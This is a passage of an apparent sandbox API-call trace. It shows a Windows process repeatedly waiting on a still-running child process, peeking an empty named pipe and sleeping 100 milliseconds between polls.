(hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0277.937] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0277.937] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.937] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.937] Sleep (dwMilliseconds=0x64) [0278.077] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0278.077] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0278.077] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.077] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.077] Sleep (dwMilliseconds=0x64) [0278.186] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0278.186] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0278.186] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.186] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.186] Sleep (dwMilliseconds=0x64) [0278.311] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0278.311] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0278.311] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.312] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.312] Sleep (dwMilliseconds=0x64) [0278.420] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0278.420] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0278.420] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.420] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.420] Sleep (dwMilliseconds=0x64) [0278.545] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0278.545] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0278.545] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.546] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0278.546] Sleep (dwMilliseconds=0x64) [0278.654] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.414] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.414] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.414] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.414] Sleep (dwMilliseconds=0x64) [0279.513] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.513] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.513] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.513] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.513] Sleep (dwMilliseconds=0x64) [0279.633] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.633] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.634] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.634] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.634] Sleep (dwMilliseconds=0x64) [0279.730] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.730] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.730] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.731] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.731] Sleep (dwMilliseconds=0x64) [0279.860] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.860] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.860] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.860] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.860] Sleep (dwMilliseconds=0x64) [0279.980] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0279.980] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0279.980] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.981] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0279.981] Sleep (dwMilliseconds=0x64) [0280.089] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.089] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.089] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.090] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.090] Sleep (dwMilliseconds=0x64) [0280.200] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.200] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.200] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.200] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.200] Sleep (dwMilliseconds=0x64) [0280.315] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.315] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.315] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.316] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.316] Sleep (dwMilliseconds=0x64) [0280.417] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.417] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.417] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.418] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.418] Sleep (dwMilliseconds=0x64) [0280.549] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.549] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.549] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.550] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.550] Sleep (dwMilliseconds=0x64) [0280.652] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.652] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.652] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.652] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.652] Sleep (dwMilliseconds=0x64) [0280.760] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.760] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.760] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.760] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.760] Sleep (dwMilliseconds=0x64) [0280.870] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.870] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.870] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.870] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.870] Sleep (dwMilliseconds=0x64) [0280.979] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0280.979] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0280.979] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.979] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0280.979] Sleep (dwMilliseconds=0x64) [0281.207] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.207] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.207] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.207] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.207] Sleep (dwMilliseconds=0x64) [0281.309] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.309] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.309] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.309] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.309] Sleep (dwMilliseconds=0x64) [0281.415] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.415] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.415] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.416] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.416] Sleep (dwMilliseconds=0x64) [0281.540] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.540] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.540] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.540] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.540] Sleep (dwMilliseconds=0x64) [0281.665] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.665] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.665] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.665] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.665] Sleep (dwMilliseconds=0x64) [0281.789] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.789] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.790] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.790] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.790] Sleep (dwMilliseconds=0x64) [0281.899] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0281.899] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0281.899] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.899] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0281.899] Sleep (dwMilliseconds=0x64) [0282.009] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0282.009] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0282.010] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.010] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.010] Sleep (dwMilliseconds=0x64) [0282.117] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0282.117] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0282.117] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.118] PeekNamedPipe (in: hNamedPipe=0x1c, 